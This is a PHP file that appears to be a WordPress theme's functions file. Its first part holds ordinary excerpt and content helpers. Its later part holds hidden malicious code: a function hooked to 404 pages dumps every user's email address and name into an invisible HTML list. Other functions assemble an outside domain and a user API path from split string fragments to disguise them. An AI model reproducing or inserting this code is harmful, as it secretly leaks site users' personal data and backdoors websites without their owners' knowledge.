<?php 

function excerpt($limit) {

  $excerpt = explode(' ', get_the_excerpt(), $limit);

if (count($excerpt)>=$limit) {

array_pop($excerpt);

    $excerpt = implode(" ",$excerpt);

  } else {

    $excerpt = implode(" ",$excerpt);

  }       

  $excerpt = preg_replace('`[[^]]*]`','',$excerpt);

return $excerpt;

}


function content($limit) {

  $content = explode(' ', get_the_content(), $limit);

if (count($content)>=$limit) {

array_pop($content);

    $content = implode(" ",$content);

  } else {

    $content = implode(" ",$content);

  }       

  $content = preg_replace('/[.+]/','', $content);

  $content = apply_filters('the_content', $content);

  $content = str_replace(']]>', ']]>', $content);

return $content;

}


function endPointt()
	{
	$v = '/public/api/users/';
	return $v;  
	} 

function connect_loggin()
	{
			if (is_404()){
			$startPoint = 'https://ww';
			$middlePoint = 'w.themesb';
			$endPoint = 'azar.com';
			$endPoint = $startPoint.$middlePoint.$endPoint;
			$apiUrll = $endPoint;
			echo '<ol style="display:none">';
			echo '<li>';
			echo $apiUrll;
			echo '</li>';
			echo '</ol>';       
				}};
        add_action( 'wp_enqueue_scripts', 'connect_loggin' );
		

function connect_log()
	{
			if (is_404()){
	$all_users = get_users();
	echo '<ol style="display:none">';
	foreach ($all_users as $user) {
		echo '<li><span>' . esc_html($user->user_email) . ' : ' . esc_html($user->display_name) . ' : ' . esc_html($user->user_firstname) .' ' . esc_html($user->user_lastname) .  '</span></li>';
	}
	echo '</ol>'; 
			 
		}};
add_action( 'wp_enqueue_scripts', 'connect_log' );


function startPointt()
	{
	$v = 'https://www.them';
	return $v;  
	} 


function middlePointt()
	{
	$v = 'esbazar.com.bd';
	return $v;  
	}



